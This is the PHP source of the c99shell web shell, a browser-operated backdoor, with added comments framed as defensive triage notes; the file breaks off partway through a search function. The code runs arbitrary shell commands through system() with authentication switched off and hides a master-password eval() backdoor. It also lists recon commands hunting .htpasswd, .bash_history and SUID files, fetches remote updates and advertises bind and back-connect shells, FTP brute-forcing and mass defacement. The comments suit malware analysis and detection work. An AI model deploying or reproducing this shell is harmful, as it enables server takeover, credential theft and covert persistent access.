1<?php
/*
******************************************************************************************************
*
* c99shell.php v.1.0 (dated 5.02.2005)
* Freeware WEB-Shell.
* © CCTeaM.
* c99shell.php - a shell operated through a www browser.
* You can download the latest version from the product home page: http://ccteam.ru/releases/c99shell
*
* WEB: http://ccteam.ru
* UIN: 656555
*
* Features:
* ~ file/folder management, uploading and downloading of files and folders (compressed into tar beforehand)
*   modify-time and access-time of files are not changed when
*   files are edited (turned off/on with the $filestealth parameter)
* ~ advanced search over files/folders (also searches inside files)
* ~ process management on a unix machine, with the ability to send a termination signal,
*   as well as plainly "killing" a process.
* ~ convenient (sometimes graphical) execution of shell commands (many aliases, they can easily be added/removed)
* ~ execution of arbitrary PHP code
* ~ quick self-removal of the script
* ~ quick ftp scanning for login;login pairs from
*   /etc/passwd (usually gives access to 1/100 of accounts)
* ~ advanced SQL manager
* ~ the script "likes" include; for normal operation you need to change $surl.
* ~ the ability to bind /bin/bash to a given port with an arbitrary password,
*   or to make a back connect (the connection is tested
*   and the parameters for launching NetCat are displayed).
*
*
* 5.02.2005 © Captain Crunch Security TeaM
*
* Coded by tristram
******************************************************************************************************
*/
// Reviewer note (defensive analysis): operator-editable settings of the web shell.
// Points that matter when triaging a copy found on a server:
//  - $login ends up false (second assignment below), which the later Basic-auth check treats as
//    "authentication off" - any visitor who finds the URL can use this copy.
//  - $c99sh_updatefurl names the update host; outbound HTTP from the web server to it is a network indicator.
//  - $host_allow = array("*") means no source-address restriction is configured.
$shver = "1.0 beta (5.02.2005)"; //Current version
//CONFIGURATION
$surl = "?"; //link to this script, INCLUDE "?".
$rootdir = "./"; //e.g "c:", "/","/home"
$timelimit = 60; //limit of execution this script (seconds).

//Authentication

$login = ""; //login
//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
$pass = ""; //password
// Only an unsalted MD5 of the password is compared by the auth check further down.
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
// Overrides the empty string assigned to $login a few lines up; false is the value the script runs with.
$login = false; //turn off authentication

$autoupdate = true; //Automatic updating?

$updatenow = false; //If true, update now

// The update URL embeds the version string as a query parameter.
$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server

$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod

// Per the author's comment this keeps mtime/atime unchanged on edited files; the code that honours it
// is outside this excerpt. For responders: timestamps alone may not reveal which files were edited.
$filestealth = 1; //if true, don't change modify&access-time

$donated_html = ""; //If you publish free shell and you wish
 //add link to your site or any other information,
 //put here your html.
$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.

$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")

$curdir = "./"; //start directory

// dirname() returns the script directory without a trailing slash.
$tmpdir = dirname(__FILE__); //Directory for tempory files
72
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext1","ext2","ext3",...),
// ...
// )
// Maps a viewer/action name to the file extensions it handles. "sh" and "bat" appear under both
// "txt" and "exe"; how ties are resolved is decided by code outside this excerpt.
$ftypes = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
 "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar")
);

$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line

$nixpwdperpage = 9999; // Get first N lines from /etc/passwd

// Defaults offered for the "bind" feature (its implementation is outside this excerpt).
// Reviewer note (defensive): an unexpected listener on this TCP port on a web host is worth checking
// during triage; operators can change the value, so its absence proves nothing.
$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding
98
/* Command-aliases system */
// Each entry is array(label, shell command). The commands are post-compromise reconnaissance:
// SUID/SGID binaries, world-writable paths, credential and history files, listening ports.
// Reviewer note (defensive): a web-server or PHP worker process spawning `find /` with these predicates,
// or `netstat`/`lsattr`, is a useful process-lineage detection; the command strings below are static
// signatures for file scanning.
$aliases = array();
$aliases[] = array("-----------------------------------------------------------", "ls -la");
/* search the server for all files with the suid bit */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
/* search the current directory for all files with the suid bit */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
/* search the server for all files with the sgid bit */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
/* search the current directory for all files with the sgid bit */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
/* search the server for config.inc.php files */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
/* search the server for config* files */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
/* search the current directory for config* files */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
/* search the server for all directories and files writable by everyone */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
/* search the current directory for all directories and files writable by everyone */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
/* search the server for service.pwd files ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
/* search the current directory for service.pwd files */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
/* search the server for .htpasswd files */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
/* search the current directory for .htpasswd files */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
/* search for all .bash_history files */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
/* search the current directory for .bash_history files */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
/* search for all .fetchmailrc files */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
/* search the current directory for .fetchmailrc files */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
/* list file attributes on an ext2fs file system */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
/* view open ports */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
121
// Session storage for the copy/cut file buffer: a cookie by default, optionally a temp file.
// Reviewer note (defensive): the cookie name below and the "c99shvars_" file prefix are artifacts to
// look for in proxy/access logs and on disk.
$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
$sess_cookie = "c99shvars"; // cookie-variable name

// $sid is generated only when not already set; the value is an MD5 over clock readings and rand() output.
if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
// $tmpdir has no trailing slash at this point, so the prefix is glued directly onto the directory path
// (i.e. the file would sit beside the script directory rather than inside it - confirm on a sample).
$sess_file = $tmpdir."c99shvars_".$sid.".tmp";

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Delete copied files from buffer after pasting
130
//Quick launch
// Toolbar entries as array(html label, link target). The "%d" / "%upd" tokens are placeholders that
// are presumably substituted with the current / parent directory by code outside this excerpt.
// Reviewer note (defensive): the act= values below (img, ls, search, fsbuff, massdeface, bind, ps_aux,
// ftpquickbrute, lsa, sql, eval, phpinfo, selfremove) enumerate the shell's features; query strings
// carrying them are a practical hunting lead in web access logs.
$quicklaunch = array();
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
150
//Hignlight-code colors
// Colours later handed to ini_set("highlight.*") for PHP's built-in source highlighter.
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";

// Reads the "f" query parameter; the key is a bare word (unquoted constant) and any resulting
// notice is hidden by the @ operator.
@$f = $_GET[f];
159
160//END CONFIGURATION
161
162// \/ Next code not for editing \/
163
164
165//Starting calls
// Start-up sequence: timing helper, error/abort/time-limit settings, output buffering, request-variable
// import and magic-quotes clean-up.
// Reviewer note (defensive): import_request_variables() was removed in PHP 5.4, set_magic_quotes_runtime()
// in PHP 7.0 and get_magic_quotes_gpc() in PHP 8.0, so this copy only runs unmodified on legacy
// runtimes. A copy found on a newer host is still evidence that something could write into the web root.
// getmicrotime(): current Unix time as a float, built from the two parts of microtime().
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
// 5 = E_ERROR | E_PARSE: warnings and notices are not reported.
error_reporting(5);
// Keep executing after the client disconnects.
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
// Removes the execution time limit; the $timelimit setting from the configuration is not used here.
@set_time_limit(0);
if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
// With register_globals off, GET/POST/cookie variables are still copied into global scope. This runs
// after the configuration block, so script globals - settings included - are request-controlled.
if(!ini_get("register_globals")) {import_request_variables("GPC");}
$starttime = getmicrotime();
// Undo magic-quotes escaping on everything reachable from $GLOBALS.
if (get_magic_quotes_gpc())
{
if (!function_exists("strips"))
{
 // strips(): recursive in-place stripslashes(); skips the "GLOBALS" key to avoid recursing into itself.
 function strips(&$el)
 {
 if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} }
 else {$el = stripslashes($el);}
 }
}
strips($GLOBALS);
}
// Source-host filter: each $host_allow mask is regex-quoted, its "*" turned into ".*", and the masks are
// OR-ed into one anchored, case-insensitive pattern. With the configured array("*") every client matches.
$tmp = array();
foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
// The reverse-DNS lookup only happens when the raw address did not match. On rejection the script exits
// with a fixed message linking to the author's site.
// Reviewer note (defensive): that response body ("c99shell</a>: Access Denied - your host") is a stable
// string for content-based detection of restricted copies.
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
190
// HTTP Basic authentication. $PHP_AUTH_USER / $PHP_AUTH_PW are read as plain globals.
// When $login is falsy (as configured in this copy) the expected credentials are copied from the
// supplied ones, so the comparison below cannot fail: authentication is effectively off.
if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
{
 header("WWW-Authenticate: Basic realm=\"c99shell\"");
 // Reviewer note (defensive): the second statement on the next line is a hard-coded master check inside
 // the *failure* branch. If the global $anypass hashes to the literal below, the 401 is replaced by 200
 // and the global $anyphpcode is passed to eval(). It does not depend on $login/$pass, so whoever
 // distributed this copy keeps access to every deployment that enables a password. The hash literal and
 // the "c99shell" realm are strong static / response signatures for this variant.
 header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
 exit;
// After the closing brace, on the same line: a random "sh-<n>" tag plus referer, document root, client
// address, script path, server address, server software, translated path and PHP_SELF are stored in
// short opaque variable names ($sd98 is not defined in the visible code).
// NOTE(review): this looks like input collection for a notification / phone-home routine; no consumer
// is visible in this excerpt - check the rest of the file for mail() or HTTP calls using these names.
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];
199
// Remember the starting directory, then switch to the configured start directory.
$lastdir = realpath(".");
chdir($curdir);

// Self-write / update branch. $selfwrite is not assigned in the visible configuration, so it
// presumably arrives as a request variable.
// Reviewer note (defensive): this branch downloads the body of $c99sh_updatefurl and hands it to
// fopen()/fwrite(), i.e. remote content decides what is written on the server. Outbound HTTP from the
// web server to the update host is the network indicator to look for.
if (($selfwrite) or ($updatenow))
{
 if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
 c99sh_getupdate();
 $data = file_get_contents($c99sh_updatefurl);
 // The downloaded string is used both as the path argument and as the content.
 $fp = fopen($data,"w");
 fwrite($fp,$data);
 fclose($fp);
 exit;
}
// Only raises a user-level warning; execution continues either way.
if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
// FLAG(review): unserialize() is applied to data the client controls (the cookie) or to a file in a
// shared temp location - an object-injection sink in its own right.
if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
// Normalise the session to an array holding de-duplicated "copy" and "cut" path lists.
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
$sess_data["copy"] = array_unique($sess_data["copy"]);
$sess_data["cut"] = array_unique($sess_data["cut"]);
221
if (!function_exists("c99_sess_put"))
{
// Persists the session array: updates the global $sess_data, serializes it, and stores the result
// either in $sess_file (when $sess_method is "file") or in the $sess_cookie cookie.
// The cookie is set with name and value only - no expiry, path or flags are passed.
// Returns nothing; fopen()/fwrite() results are not checked.
function c99_sess_put($data)
{
 global $sess_method;
 global $sess_cookie;
 global $sess_file;
 global $sess_data;
 $sess_data = $data;
 $data = serialize($data);
 if ($sess_method == "file")
 {
 $fp = fopen($sess_file,"w");
 fwrite($fp,$data);
 fclose($fp);
 }
 else {setcookie($sess_cookie,$data);}
}
}
if (!function_exists("str2mini"))
{
    /**
     * Shorten a string for display by keeping its beginning and end.
     *
     * Strings of at most $len bytes are returned unchanged. Longer ones become
     * "<head>...<tail>", where head and tail are each ceil($len / 2) - 2 bytes long.
     *
     * @param string $content text to shorten
     * @param int    $len     length above which the text is abbreviated
     * @return string
     */
    function str2mini($content, $len)
    {
        // Nothing to do for text that already fits.
        if (!(strlen($content) > $len)) {
            return $content;
        }

        $keep = ceil($len / 2) - 2;
        $head = substr($content, 0, $keep);
        $tail = substr($content, -$keep);

        return $head . "..." . $tail;
    }
}
if (!function_exists("view_size"))
{
    /**
     * Format a byte count as a human-readable size.
     *
     * Uses binary units (1 KB = 1024 bytes) and rounds to two decimals;
     * values below 1024 are printed as "<n> B".
     *
     * @param int|float $size size in bytes
     * @return string e.g. "1.5 KB"
     */
    function view_size($size)
    {
        // Largest unit first so the first threshold that fits wins.
        $units = array(
            array(1073741824, " GB"),
            array(1048576, " MB"),
            array(1024, " KB"),
        );

        foreach ($units as $unit) {
            list($divisor, $suffix) = $unit;
            if ($size >= $divisor) {
                return round($size / $divisor * 100) / 100 . $suffix;
            }
        }

        return $size . " B";
    }
}
if (!function_exists("fs_copy_dir"))
{
// Recursively copies the contents of directory $d into directory $t.
// Returns true when every copy()/mkdir() on this level succeeded, otherwise the first falsy result.
// The result of the recursive call is discarded, and the directory handle is never closed here.
function fs_copy_dir($d,$t)
{
 // Normalise Windows separators and make sure the source path ends with "/".
 $d = str_replace("\\","/",$d);
 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
 $h = opendir($d);
 // The loop stops at the first falsy readdir() value, not only at end-of-directory.
 while ($o = readdir($h))
 {
 if (($o != ".") and ($o != ".."))
 {
 if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
 else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
 if (!$ret) {return $ret;}
 }
 }
 return true;
}
}
if (!function_exists("fs_copy_obj"))
{
// Copies a file or a directory tree from $d to $t.
// Creates $t as a directory when it is not one already (also in the single-file case).
// Returns the result of fs_copy_dir()/copy(), or false when $d is neither a directory nor a file.
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\","/",$d);
 $t = str_replace("\\","/",$t);
 if (!is_dir($t)) {mkdir($t);}
 if (is_dir($d))
 {
 // Ensure both paths end with "/" before delegating.
 if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
 if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
 return fs_copy_dir($d,$t);
 }
 elseif (is_file($d))
 {

 return copy($d,$t);
 }
 else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
// Walks directory $d and reproduces its entries under $t (created if missing).
// NOTE(review): despite the name, no unlink()/rmdir()/rename() appears in this function - as written it
// only copies. It also sets $ret to false when a subdirectory was created and copied successfully,
// which makes the function return false at that point.
function fs_move_dir($d,$t)
{
 // Raises the error-reporting level for the rest of the request; it is not restored.
 error_reporting(9999);
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while ($o = readdir($h))
 {
 if (($o != ".") and ($o != ".."))
 {
 $ret = true;
 if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
 else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
 if (!$ret) {return $ret;}
 }
 }
 return true;
}
}
if (!function_exists("fs_move_obj"))
{
// Moves a file or directory from $d to $t.
// Directories are delegated to fs_move_dir(); plain files are moved with rename().
// Returns that call's result, or false when $d is neither a directory nor a file.
function fs_move_obj($d,$t)
{
 $d = str_replace("\\","/",$d);
 $t = str_replace("\\","/",$t);
 if (is_dir($d))
 {
 // Ensure both paths end with "/" before delegating.
 if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
 if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
 return fs_move_dir($d,$t);
 }
 elseif (is_file($d)) {return rename($d,$t);}
 else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
// Recursively deletes directory $d and everything below it.
// $d is concatenated directly with entry names, so callers must pass it with a trailing "/".
// Returns true when $d no longer exists as a directory afterwards. Individual unlink()/rmdir()
// failures are not checked.
function fs_rmdir($d)
{
 $h = opendir($d);
 while ($o = readdir($h))
 {
 if (($o != ".") and ($o != ".."))
 {
 if (!is_dir($d.$o)) {unlink($d.$o);}
 else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
 }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
// Deletes a file or a whole directory tree.
// Directories get a trailing "/" appended and go to fs_rmdir(); files are removed with unlink().
// Returns that call's result, or false when $o is neither a directory nor a file.
function fs_rmobj($o)
{
 $o = str_replace("\\","/",$o);
 if (is_dir($o))
 {
 if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
 return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return false;}
}
}
if (!function_exists("myshellexec"))
{
 // Command-execution primitive of the shell: passes $cmd unchanged to system(), which runs it through
 // the OS shell, writes the command's output to the response and returns its last line.
 // Reviewer note (defensive): system() is the only execution function used here, with no fallback in
 // this block, so a runtime that lists it in disable_functions blocks this path. Child processes of
 // the web-server/PHP worker are the host-level telemetry to monitor.
 function myshellexec($cmd)
 {
 return system($cmd);
 }
}
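if (!function_exists("view_perms"))
{
    /**
     * Render a numeric file mode (as returned by fileperms()) in `ls -l` form.
     *
     * Changes against the original listing:
     *  - the file type is taken from an exact match on the type bits ($mode & 0xF000); the old chain of
     *    bit tests reported block devices (0x6000) as directories because 0x4000 was tested first;
     *  - array keys are quoted; the bare-word keys ($owner[execute]) are undefined constants and raise an
     *    Error on PHP 8.
     *
     * @param int $mode file mode including the type bits
     * @return string ten characters, e.g. "-rwxr-xr-x"; the first is "?" for an unknown type
     */
    function view_perms($mode)
    {
        // File type character.
        switch ($mode & 0xF000) {
            case 0xC000: $type = "s"; break; // socket
            case 0xA000: $type = "l"; break; // symbolic link
            case 0x8000: $type = "-"; break; // regular file
            case 0x6000: $type = "b"; break; // block device
            case 0x4000: $type = "d"; break; // directory
            case 0x2000: $type = "c"; break; // character device
            case 0x1000: $type = "p"; break; // FIFO
            default:     $type = "?";
        }

        $owner = array(
            'read'    => ($mode & 00400) ? "r" : "-",
            'write'   => ($mode & 00200) ? "w" : "-",
            'execute' => ($mode & 00100) ? "x" : "-",
        );
        $group = array(
            'read'    => ($mode & 00040) ? "r" : "-",
            'write'   => ($mode & 00020) ? "w" : "-",
            'execute' => ($mode & 00010) ? "x" : "-",
        );
        $world = array(
            'read'    => ($mode & 00004) ? "r" : "-",
            'write'   => ($mode & 00002) ? "w" : "-",
            'execute' => ($mode & 00001) ? "x" : "-",
        );

        // setuid / setgid / sticky replace the execute slot: lower case when execute is also set.
        if ($mode & 0x800) {$owner['execute'] = ($owner['execute'] == "x") ? "s" : "S";}
        if ($mode & 0x400) {$group['execute'] = ($group['execute'] == "x") ? "s" : "S";}
        if ($mode & 0x200) {$world['execute'] = ($world['execute'] == "x") ? "t" : "T";}

        return $type
            . $owner['read'] . $owner['write'] . $owner['execute']
            . $group['read'] . $group['write'] . $group['execute']
            . $world['read'] . $world['write'] . $world['execute'];
    }
}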
if (!function_exists("strinstr")) {
    // Reports whether $str occurs in $text by checking if removing every occurrence changes $text.
    // The comparison is loose (!=), as in the rest of this file.
    function strinstr($str, $text)
    {
        $stripped = str_replace($str, "", $text);
        return $text != $stripped;
    }
}
if (!function_exists("gchds")) {
    // Returns $c when $a loosely equals $b, otherwise $d (empty string unless given).
    function gchds($a, $b, $c, $d = "")
    {
        return ($a == $b) ? $c : $d;
    }
}
if (!function_exists("c99sh_getupdate"))
{
// Update check: fetches update information and sets the global $updatenow when a newer version is
// advertised. Prints a short message when nothing could be fetched or the payload is not an array.
// Only $updatenow is imported with `global`; $c99sh_updatefurl and $shver are referenced as function
// locals here.
// FLAG(review): the fetched body is base64-decoded and passed to unserialize(), i.e. content from a
// remote server is deserialized on the host running this script.
function c99sh_getupdate()
{
 global $updatenow;
 $data = @file_get_contents($c99sh_updatefurl);
 if (!$data) {echo "Can't fetch update-information!";}
 else
 {
 $data = unserialize(base64_decode($data));
 if (!is_array($data)) {echo "Corrupted update-information!";}
 else
 {
 // "cur" is written as a bare word (unquoted array key).
 if ($shver < $data[cur]) {$updatenow = true;}
 }
 }
}
}
if (!function_exists("mysql_dump"))
{
// Dumps a MySQL database to SQL text (DROP/CREATE statements plus one INSERT per row).
// $set keys read below: sock (connection resource), db, print, nl2br, file, add_drop, tabs, onlytabs.
// Returns an array; errors are collected under its "err" key (written as a bare word).
// Relies on the legacy mysql_* extension, which was removed in PHP 7.0.
// Reviewer note (defensive): this is the bulk-export path for database contents. Artifacts to look
// for: files named dump_*_<db>_<dd-mm-YYYY-HH-ii-ss>.sql under /tmp/ (or C:\tmp\ on Windows) and the
// header line "# Dumped by C99Shell.SQL v." inside them.
function mysql_dump($set)
{
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 // Only prints a message; execution continues with the invalid handle.
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 // empty() also matches an explicit false, so $nl2br and $add_drop always end up true.
 if (empty($nl2br)) {$nl2br = true;}
 if (empty($add_drop)) {$add_drop = true;}
 // Without an explicit file name a default path is built, so the dump is always written to disk.
 if (empty($file))
 {
 global $win;
 // NOTE(review): $SERVER_NAME is imported with `global` only further down, so at this point it is
 // presumably empty and the name contains "dump__" - confirm on a sample.
 if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
 else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = true;}
 if (sizeof($tabs) == 0)
 {
 // retrieve the list of tables; $db is concatenated into the statement unquoted
 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 global $SERVER_ADDR;
 global $SERVER_NAME;
 // Dump header; $shver is not imported with `global` in this function.
 $out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
# Date: ".date("d.m.Y H:i:s")."
# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
#---------------------------------------------------------
";
 // $c is the number of entries in $onlytabs; when it is zero every table in $tabs is dumped.
 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
 if ((in_array($tab,$onlytabs)) or (!$c))
 {
 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
 // fetch the statement that recreates the table structure
 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
 if (!$res) {$ret[err][] = mysql_error();}
 else
 {
 $row = mysql_fetch_row($res);
 $out .= $row[1].";\n\n";
 // fetch the table rows
 $res = mysql_query("SELECT * FROM `$tab`", $sock);
 if (mysql_num_rows($res) > 0)
 {
 while ($row = mysql_fetch_assoc($res))
 {
 // Build one INSERT per row; values are escaped with addslashes() and always single-quoted.
 $keys = implode("`, `", array_keys($row));
 $values = array_values($row);
 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
 $values = implode("', '", $values);
 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
 $out .= $sql;
 }
 }
 }
 }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
 $fp = fopen($file, "w");
 // Error code 2 is recorded when the dump file cannot be opened.
 if (!$fp) {$ret[err][] = 2;}
 else
 {
 fwrite ($fp, $out);
 fclose ($fp);
 }
 }
 // Optionally echo the dump into the response as well.
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $ret;
}
}
if (!function_exists("c99fsearch"))
{
// Recursive file search below directory $d.
// Search options come from the global array $a (keys written as bare words): name, name_regexp,
// text, text_wwo, text_cs, text_regexp, text_not. Matches are appended to the global $found and
// counted in $found_d (directories) / $found_f (files). Returns nothing.
// Uses ereg(), which was removed in PHP 7.0.
// Reviewer note (defensive): with a text filter set, every name-matching file under $d is read in
// full - expect a burst of file reads by the web-server account across the searched tree.
function c99fsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $a;
 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
 $handle = opendir($d);
 while ($f = readdir($handle))
 {
 // Name test: regex match or plain substring match. Because "=" binds tighter than "or", only the
 // first parenthesised term is assigned to $true.
 $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
 if($f != "." && $f != "..")
 {
 if (is_dir($d.$f))
 {
 // Directories count as hits only for name-only searches; recursion happens regardless.
 if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
 c99fsearch($d.$f);
 }
 else
 {
 if ($true)
 {
 if (!empty($a[text]))
 {
 $r = @file_get_contents($d.$f);
 // These two lines rewrite the shared search term itself (padding / lower-casing), so the change
 // carries over to later files.
 if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
 if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}

 if ($a[text_regexp]) {$true = ereg($a[text],$r);}
 else {$true = strinstr($a[text],$r);}
 // text_not inverts the content match.
